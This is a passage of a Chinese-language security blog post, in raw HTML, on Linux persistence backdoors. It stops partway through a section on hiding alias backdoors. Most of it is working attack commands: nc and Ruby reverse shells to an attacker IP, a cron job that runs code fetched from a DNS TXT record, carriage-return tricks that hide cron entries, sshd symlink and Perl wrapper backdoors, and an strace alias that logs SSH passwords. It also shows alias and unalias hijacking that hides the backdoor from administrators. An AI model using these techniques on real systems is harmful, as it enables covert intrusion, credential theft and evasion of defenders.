<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 6.2.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/blog-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/blog-16x16.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="https://fonts.lug.ustc.edu.cn/css?family=Noto+Serif+SC:300,300italic,400,400italic,700,700italic%7CRoboto+Mono:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.0/css/all.min.css" integrity="sha256-AbA177XfpSnFEvgpYu1jMygiLabzPCJCRIBtR5jGc0k=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/themes/blue/pace-theme-minimal.css">
  <script src="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/pace.min.js" integrity="sha256-gqd7YTjg/BtfqWSwsJOvndl0Bxc8gFImLEkXQT8+qj0=" crossorigin="anonymous"></script>

<script class="next-config" data-name="main" type="application/json">{"hostname":"l0n9w4y.cc","root":"/","images":"/images","scheme":"Mist","darkmode":true,"version":"8.13.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="本文记录Linux环境下权限维持思路及方法...">
<meta property="og:type" content="article">
<meta property="og:title" content="权限维持Linux后门篇">
<meta property="og:url" content="https://l0n9w4y.cc/posts/20809/index.html">
<meta property="og:site_name" content="L0n9w4y">
<meta property="og:description" content="本文记录Linux环境下权限维持思路及方法...">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2021-04-05T13:30:14.000Z">
<meta property="article:modified_time" content="2022-10-25T13:50:53.211Z">
<meta property="article:author" content="L0n9w4y">
<meta property="article:tag" content="Linux">
<meta property="article:tag" content="Persistence">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="https://l0n9w4y.cc/posts/20809/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://l0n9w4y.cc/posts/20809/","path":"posts/20809/","title":"权限维持Linux后门篇"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>权限维持Linux后门篇 | L0n9w4y</title>
  






  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">L0n9w4y</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-攻防"><a href="/security/" rel="section"><i class="fa fa-navicon fa-fw"></i>攻防</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li>
  </ul>
</nav>




</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-Metasploit"><span class="nav-text">0x01 Metasploit</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-Unix-%E4%B8%AD%E5%8F%8D%E5%BC%B9shell%E7%9A%84paylaod"><span class="nav-text">1. Unix 中反弹shell的paylaod</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-msfvenom-%E7%94%9F%E6%88%90payload"><span class="nav-text">2. msfvenom 生成payload</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-meterpreter-shell"><span class="nav-text">3. meterpreter shell</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E5%90%8E%E9%97%A8"><span class="nav-text">0x02 计划任务后门</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-%E6%9F%A5%E6%89%BE%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E7%9B%B8%E5%85%B3%E6%96%87%E4%BB%B6"><span class="nav-text">1. 查找计划任务相关文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-%E5%AE%9A%E6%97%B6%E4%BB%BB%E5%8A%A1%E6%96%87%E4%BB%B6%E8%AF%B4%E6%98%8E"><span class="nav-text">2. 定时任务文件说明</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E9%9A%90%E8%97%8F%E5%90%8E%E9%97%A8"><span class="nav-text">3. 计划任务隐藏后门</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-SSH%E7%B3%BB%E5%88%97%E5%90%8E%E9%97%A8"><span class="nav-text">0x03 SSH系列后门</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-%E8%BD%AF%E9%93%BE%E6%8E%A5%E5%90%8E%E9%97%A8"><span class="nav-text">1. 软链接后门</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-SSH-Wapper-%E5%90%8E%E9%97%A8"><span class="nav-text">2. SSH Wapper 后门</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-SSH%E5%85%AC%E9%92%A5%E5%90%8E%E9%97%A8"><span class="nav-text">3. SSH公钥后门</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-SSH-Keylogger"><span class="nav-text">4. SSH Keylogger</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04-alias%E5%90%8E%E9%97%A8"><span class="nav-text">0x04 alias后门</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-%E5%90%8E%E9%97%A8%E5%AD%98%E6%94%BE%E4%BD%8D%E7%BD%AE"><span class="nav-text">1. 后门存放位置</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-%E5%90%8E%E9%97%A8%E5%88%B6%E4%BD%9C"><span class="nav-text">2. 后门制作</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-%E5%90%8E%E9%97%A8%E9%9A%90%E8%97%8F"><span class="nav-text">3. 后门隐藏</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x05-vim%E5%90%8E%E9%97%A8"><span class="nav-text">0x05 vim后门</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x06-LD-PRELOAD-%E5%90%8E%E9%97%A8"><span class="nav-text">0x06 LD_PRELOAD 后门</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F%E9%9A%90%E8%97%8F"><span class="nav-text">环境变量隐藏</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E5%B7%A5%E5%85%B7"><span class="nav-text">利用工具</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0xFF-Reference"><span class="nav-text">0xFF Reference</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="L0n9w4y"
      src="/images/hexo.png">
  <p class="site-author-name" itemprop="name">L0n9w4y</p>
  <div class="site-description" itemprop="description">攻防对抗，問道遠兮，求索未止...</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">37</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">37</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="https://github.com/L0n9w4y" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;L0n9w4y" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://weibo.com/l0n9w4y" title="Weibo → https:&#x2F;&#x2F;weibo.com&#x2F;l0n9w4y" rel="noopener" target="_blank"><i class="fab fa-weibo fa-fw"></i>Weibo</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://twitter.com/_L0n9_" title="Twitter → https:&#x2F;&#x2F;twitter.com&#x2F;_L0n9_" rel="noopener" target="_blank"><i class="fab fa-twitter fa-fw"></i>Twitter</a>
      </span>
  </div>



        </div>
      </div>
        <div class="back-to-top animated" role="button" aria-label="返回顶部">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://l0n9w4y.cc/posts/20809/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/hexo.png">
      <meta itemprop="name" content="L0n9w4y">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="L0n9w4y">
      <meta itemprop="description" content="攻防对抗，問道遠兮，求索未止...">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="权限维持Linux后门篇 | L0n9w4y">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          权限维持Linux后门篇
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2021-04-05 21:30:14" itemprop="dateCreated datePublished" datetime="2021-04-05T21:30:14+08:00">2021-04-05</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E7%BA%A2%E9%98%9F%E6%B8%97%E9%80%8F/" itemprop="url" rel="index"><span itemprop="name">红队渗透</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <center>本文记录Linux环境下权限维持思路及方法...</center>

<span id="more"></span>
<hr>
<h2 id="0x01-Metasploit"><a href="#0x01-Metasploit" class="headerlink" title="0x01 Metasploit"></a>0x01 Metasploit</h2><h3 id="1-Unix-中反弹shell的paylaod"><a href="#1-Unix-中反弹shell的paylaod" class="headerlink" title="1. Unix 中反弹shell的paylaod"></a>1. Unix 中反弹shell的paylaod</h3><pre class="line-numbers language-none"><code class="language-none">msfvenom -l payloads | grep &#39;cmd&#x2F;unix&#x2F;reverse&#39;

    cmd&#x2F;unix&#x2F;reverse                                    Creates an interactive shell through two inbound connections
    cmd&#x2F;unix&#x2F;reverse_awk                                Creates an interactive shell via GNU AWK
    cmd&#x2F;unix&#x2F;reverse_bash                               Creates an interactive shell via bash&#39;s builtin &#x2F;dev&#x2F;tcp. This will not work on circa 2009 and older Debian-based Linux distributions (including Ubuntu) because they compile bash without the &#x2F;dev&#x2F;tcp feature.
    cmd&#x2F;unix&#x2F;reverse_bash_telnet_ssl                    Creates an interactive shell via mkfifo and telnet. This method works on Debian and other systems compiled without &#x2F;dev&#x2F;tcp support. This module uses the &#39;-z&#39; option included on some systems to encrypt using SSL.
    cmd&#x2F;unix&#x2F;reverse_bash_udp                           Creates an interactive shell via bash&#39;s builtin &#x2F;dev&#x2F;udp. This will not work on circa 2009 and older Debian-based Linux distributions (including Ubuntu) because they compile bash without the &#x2F;dev&#x2F;udp feature.
    cmd&#x2F;unix&#x2F;reverse_jjs                                Connect back and create a command shell via jjs
    cmd&#x2F;unix&#x2F;reverse_ksh                                Connect back and create a command shell via Ksh. Note: Although Ksh is often available, please be aware it isn&#39;t usually installed by default.
    cmd&#x2F;unix&#x2F;reverse_lua                                Creates an interactive shell via Lua
    cmd&#x2F;unix&#x2F;reverse_ncat_ssl                           Creates an interactive shell via ncat, utilizing ssl mode
    cmd&#x2F;unix&#x2F;reverse_netcat                             Creates an interactive shell via netcat
    cmd&#x2F;unix&#x2F;reverse_netcat_gaping                      Creates an interactive shell via netcat
    cmd&#x2F;unix&#x2F;reverse_nodejs                             Continually listen for a connection and spawn a command shell via nodejs
    cmd&#x2F;unix&#x2F;reverse_openssl                            Creates an interactive shell through two inbound connections
    cmd&#x2F;unix&#x2F;reverse_perl                               Creates an interactive shell via perl
    cmd&#x2F;unix&#x2F;reverse_perl_ssl                           Creates an interactive shell via perl, uses SSL
    cmd&#x2F;unix&#x2F;reverse_php_ssl                            Creates an interactive shell via php, uses SSL
    cmd&#x2F;unix&#x2F;reverse_python                             Connect back and create a command shell via Python
    cmd&#x2F;unix&#x2F;reverse_python_ssl                         Creates an interactive shell via python, uses SSL, encodes with base64 by design.
    cmd&#x2F;unix&#x2F;reverse_r                                  Connect back and create a command shell via R
    cmd&#x2F;unix&#x2F;reverse_ruby                               Connect back and create a command shell via Ruby
    cmd&#x2F;unix&#x2F;reverse_ruby_ssl                           Connect back and create a command shell via Ruby, uses SSL
    cmd&#x2F;unix&#x2F;reverse_socat_udp                          Creates an interactive shell via socat
    cmd&#x2F;unix&#x2F;reverse_ssh                                Connect back and create a command shell via SSH
    cmd&#x2F;unix&#x2F;reverse_ssl_double_telnet                  Creates an interactive shell through two inbound connections, encrypts using SSL via &quot;-z&quot; option
    cmd&#x2F;unix&#x2F;reverse_stub                               Creates an interactive shell through an inbound connection (stub only, no payload)
    cmd&#x2F;unix&#x2F;reverse_tclsh                              Creates an interactive shell via Tclsh
    cmd&#x2F;unix&#x2F;reverse_zsh                                Connect back and create a command shell via Zsh. Note: Although Zsh is often available, please be aware it isn&#39;t usually installed by default<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="2-msfvenom-生成payload"><a href="#2-msfvenom-生成payload" class="headerlink" title="2. msfvenom 生成payload"></a>2. msfvenom 生成payload</h3><pre class="line-numbers language-none"><code class="language-none">msfvenom -p &lt;payload&gt; LHOST&#x3D;&lt;LHOST&gt; LPORT&#x3D;&lt;LPORT&gt; -f &lt;format&gt; -o &lt;path&gt;

msfvenom -p &lt;payload&gt; -e &lt;encoder &gt; -i &lt;encoder times&gt; LHOST&#x3D;&lt;LHOST&gt; LPORT&#x3D;&lt;LPORT&gt; -f &lt;format&gt; -o &lt;path&gt;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>refer: <a href="https://l0n9w4y.cc/posts/16803/">https://l0n9w4y.cc/posts/16803/</a></p>
<h3 id="3-meterpreter-shell"><a href="#3-meterpreter-shell" class="headerlink" title="3. meterpreter shell"></a>3. meterpreter shell</h3><p>shell升级为 meterpreter shell</p>
<p>攻击机配置msf 监听：</p>
<pre class="line-numbers language-none"><code class="language-none">use exploit&#x2F;multi&#x2F;handler

set payload linux&#x2F;x86&#x2F;shell&#x2F;reverse_tcp

set lport 6666

set lhost 192.168.1.1

run<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>目标主机上反弹shell</p>
<pre class="line-numbers language-none"><code class="language-none">rm -f &#x2F;tmp&#x2F;f; mkfifo &#x2F;tmp&#x2F;f;cat &#x2F;tmp&#x2F;f | &#x2F;bin&#x2F;sh -i 2&gt;&amp;1 | nc 192.168.1.1 6666 &gt; &#x2F;tmp&#x2F;f<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>获取一个普通shell, 在这个shell中输入 background, 在对话中选择 y, 将shell放在了后台</p>
<p>使用 sessions -u 1 将普通shell提升为 meterpreter shell</p>
<p>sessions命令查看shell会话，sessions -i id 切换到目标shell</p>
<h2 id="0x02-计划任务后门"><a href="#0x02-计划任务后门" class="headerlink" title="0x02 计划任务后门"></a>0x02 计划任务后门</h2><h3 id="1-查找计划任务相关文件"><a href="#1-查找计划任务相关文件" class="headerlink" title="1. 查找计划任务相关文件"></a>1. 查找计划任务相关文件</h3><pre class="line-numbers language-none"><code class="language-none">1) sudo find &#x2F; -name &#39;cron*&#39; | egrep -v &#39;man|doc&#39; | sort -u

2) sudo updatedb &amp;&amp; sudo locate cron | egrep -v &#39;doc|man&#39;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<h3 id="2-定时任务文件说明"><a href="#2-定时任务文件说明" class="headerlink" title="2. 定时任务文件说明"></a>2. 定时任务文件说明</h3><pre class="line-numbers language-none"><code class="language-none">1) 用户允许&#x2F;禁止配置文件

- &#x2F;etc&#x2F;cron.deny ：用来禁止一些用户使用cron服务的配置文件

- &#x2F;etc&#x2F;cron.allow ：允许一些用户来使用cron服务的配置文件，优先级高

2) 系统配置项：系统执行的计划任务

- &#x2F;etc&#x2F;crontab 

- &#x2F;etc&#x2F;cron.d&#x2F;

3) 用户配置项：执行crontab命令操作的目录

- &#x2F;var&#x2F;spool&#x2F;cron

4) 其他计划任务文件

    &#x2F;etc&#x2F;cron.daily
    &#x2F;etc&#x2F;cron.deny
    &#x2F;etc&#x2F;cron.hourly
    &#x2F;etc&#x2F;cron.monthly
    &#x2F;etc&#x2F;cron.weekly<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>定时任务在线生成器：<a target="_blank" rel="noopener" href="https://crontab.guru/">https://crontab.guru/</a></p>
<h3 id="3-计划任务隐藏后门"><a href="#3-计划任务隐藏后门" class="headerlink" title="3. 计划任务隐藏后门"></a>3. 计划任务隐藏后门</h3><p>隐藏思路</p>
<pre class="line-numbers language-none"><code class="language-none">1) 不使用用户cron配置项：避免crontab命令查看计划任务内容

2) 不使用常用目录及文件如：&#x2F;var&#x2F;spool&#x2F;cron、&#x2F;etc&#x2F;crontab等

3) 劫持&#x2F;修改系统默认的计划任务文件：伪装文件名&#x2F;文件位置

如：&#x2F;etc&#x2F;cron.daily 、&#x2F;etc&#x2F;cron.hourly目录下自带文件<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>隐藏技巧</p>
<pre class="line-numbers language-none"><code class="language-none">1) 巧妙利用windows中的 \r（ Linux 中显示为M), 导致显示截断，从而隐藏真实的计划任务，使用crontab -e 可以看到

(crontab -l;printf &quot;*&#x2F;1 * * * * &#x2F;root&#x2F;.devops.sh;\rno crontab for &#96;whoami&#96;%100c\n&quot;)|crontab -

2) 使用DNS的TXT记录，通过解析这个记录来进行执行，使用linux.org等公共域名进行隐藏

0 1 * * * &#x2F;bin&#x2F;sh -c &quot;sh -c $(dig logging.chat TXT +short @pola.ns.cloudflare.com)&quot;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>refer：<a target="_blank" rel="noopener" href="https://blog.sucuri.net/2019/05/cronjob-backdoors.html">https://blog.sucuri.net/2019/05/cronjob-backdoors.html</a></p>
<h2 id="0x03-SSH系列后门"><a href="#0x03-SSH系列后门" class="headerlink" title="0x03 SSH系列后门"></a>0x03 SSH系列后门</h2><h3 id="1-软链接后门"><a href="#1-软链接后门" class="headerlink" title="1. 软链接后门"></a>1. 软链接后门</h3><pre class="line-numbers language-none"><code class="language-none">ln -sf &#x2F;usr&#x2F;sbin&#x2F;sshd &#x2F;tmp&#x2F;su; &#x2F;tmp&#x2F;su -oPort&#x3D;6666;

ssh root@x.x.x.x -p 6666<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<h3 id="2-SSH-Wapper-后门"><a href="#2-SSH-Wapper-后门" class="headerlink" title="2. SSH Wapper 后门"></a>2. SSH Wapper 后门</h3><pre class="line-numbers language-none"><code class="language-none">cd &#x2F;usr&#x2F;sbin&#x2F;
mv sshd ..&#x2F;bin
vim sshd &#x2F;&#x2F;编辑sshd内容为以下

#!&#x2F;usr&#x2F;bin&#x2F;perl
exec&quot;&#x2F;bin&#x2F;sh&quot; if(getpeername(STDIN)&#x3D;~&#x2F;^..0V&#x2F;); &#x2F;&#x2F; \x00\x000V是22222的大端形式
exec&#123;&quot;&#x2F;usr&#x2F;bin&#x2F;sshd&quot;&#125;&quot;&#x2F;usr&#x2F;sbin&#x2F;sshd&quot;,@ARGV;

重启sshd
service sshd restart

本机执行
socat STDIO TCP4:127.0.0.1:22,sourceport&#x3D;22222

修改源端口
import struct
buffer &#x3D; struct.pack(&#39;&gt;I&#39;,22222)
print(buffer)<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="3-SSH公钥后门"><a href="#3-SSH公钥后门" class="headerlink" title="3. SSH公钥后门"></a>3. SSH公钥后门</h3><p>攻击机中使用 ssh-keygen -t rsa 生成公私钥</p>
<p>将公钥 id_rsa.pub 上传到目标主机，保存为 ~&#x2F;.ssh&#x2F;authorized_keys</p>
<pre class="line-numbers language-none"><code class="language-none">ssh user@host<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="4-SSH-Keylogger"><a href="#4-SSH-Keylogger" class="headerlink" title="4. SSH Keylogger"></a>4. SSH Keylogger</h3><pre class="line-numbers language-none"><code class="language-none"># 利用strace工具获取ssh的读写连接的数据，以达到抓取管理员登陆其他机器的明文密码
alias ssh&#x3D;&#39;strace -o &#x2F;tmp&#x2F;.sshpwd-&#96;date &#39;+%d%h%m%s&#39;&#96;.log -e read.write.connect -s 2048 ssh&#39;

grep &quot;read(5&quot; &#x2F;tmp&#x2F;.sshpwdxxxxxxxx.log<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<h2 id="0x04-alias后门"><a href="#0x04-alias后门" class="headerlink" title="0x04 alias后门"></a>0x04 alias后门</h2><h3 id="1-后门存放位置"><a href="#1-后门存放位置" class="headerlink" title="1. 后门存放位置"></a>1. 后门存放位置</h3><p>系统启动默认加载的配置文件</p>
<pre class="line-numbers language-none"><code class="language-none">1) &#x2F;etc&#x2F;profile

【系统级】Linux是一个多用户操作系统。用户登录或切换（即Login shell 启动）时都有一个专用的运行环境，但首先执行 &#x2F;etc&#x2F;profile

2) &#x2F;etc&#x2F;bashrc

【系统级】在 bash shell 打开时运行，修改该文件配置的环境变量将会影响所有用户使用的bash shell

3) ~&#x2F;.bashrc

【用户级】当用户登录时以及每次打开新的shell时该文件都将被读取，不推荐在这里配置用户专用的环境变量，因为每开一个shell，该文件都会被读取一次

4) ~&#x2F;.bash_profile &amp;&amp; ~.&#x2F;bash_login

【用户级】

如果有其中的一个文件存在的话, 当启动的是一个登录shell时，Bash 会执行该文件而不会执行~&#x2F;.profile 

如果两个文件都存在的话，Bash 将会优先执行~&#x2F;.bash_profile 而不是~&#x2F;.bash_login 

5) ~&#x2F;.bash_logout

【用户级】当每次退出系统(退出bash shell)时执行该文件<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="2-后门制作"><a href="#2-后门制作" class="headerlink" title="2. 后门制作"></a>2. 后门制作</h3><p>当前用户目录下.bashrc</p>
<pre class="line-numbers language-none"><code class="language-none">alias ssh&#x3D;&#39;strace -o &#x2F;tmp&#x2F;sshpwd-&#96;date &#39;+%d%h%m%s&#39;&#96;.log -e read,write,connect -s 2048 ssh&#39;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>创建alias后门</p>
<pre class="line-numbers language-none"><code class="language-none">1) 受控端创建别名

alias ls&#x3D;&quot;alerts()&#123; ls $* --color&#x3D;auto;ruby -rsocket -e &#39;exit if fork;c&#x3D;TCPSocket.new(&quot;&#39;&quot;&#39;&quot;192.168.1.1&quot;&#39;&quot;&#39;&quot;,&quot;&#39;&quot;&#39;&quot;6666&quot;&#39;&quot;&#39;&quot;);while(cmd&#x3D;c.gets);IO.popen(cmd,&quot;&#39;&quot;&#39;&quot;r&quot;&#39;&quot;&#39;&quot;)&#123;|io|c.print io.read&#125;end&#39;;&#125;;alerts&quot;

2）攻击端监听本地端口

nc -lvnp 6666

3) 受控端执行别名命令，攻击端获得反弹shell<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="3-后门隐藏"><a href="#3-后门隐藏" class="headerlink" title="3. 后门隐藏"></a>3. 后门隐藏</h3><p>alias命令可以查看当前的别名，会让别名后门暴露。因此需要劫持alias命令，使输出中不显示后门指令。</p>
<p>另外unalias命令会清除别名，也需要对其进行劫持，避免后门指令的别名被清除。</p>
<p><strong>1）创建unalias别名</strong></p>
<pre class="line-numbers language-none"><code class="language-none">alias unalias&#x3D;&#39;alerts()&#123; if [ $# !&#x3D; 0 ]; then if [ $* !&#x3D; &quot;ls&quot; ]&amp;&amp;[ $* !&#x3D; &quot;alias&quot; ]&amp;&amp;[ $* !&#x3D; &quot;unalias&quot; ]; then unalias $*;else echo &quot;-bash: unalias: $&#123;*&#125;: not found&quot;;fi;else echo &quot;unalias: usage: unalias [-a] name [name ...]&quot;;fi;&#125;;alerts&#39;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><strong>2) 创建alias的别名</strong></p>
<pre class="line-numbers language-none"><code class="language-none">劫持前先将当前alias结果保存至比较隐蔽的文件
alias &gt; &#x2F;etc&#x2F;gnupg&#x2F;.gnupg

alias alias&#x3D;&quot;cat &#x2F;etc&#x2F;gnupg&#x2F;.gnupg&quot;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p><strong>3) 文件位置隐蔽</strong></p>
<pre class="line-numbers language-none"><code class="language-none">1) 在正常的位置创建合理的文件
vi &#x2F;etc&#x2F;yum&#x2F;yum-update.rc  &#x2F;&#x2F;创建文件，加入别名设置

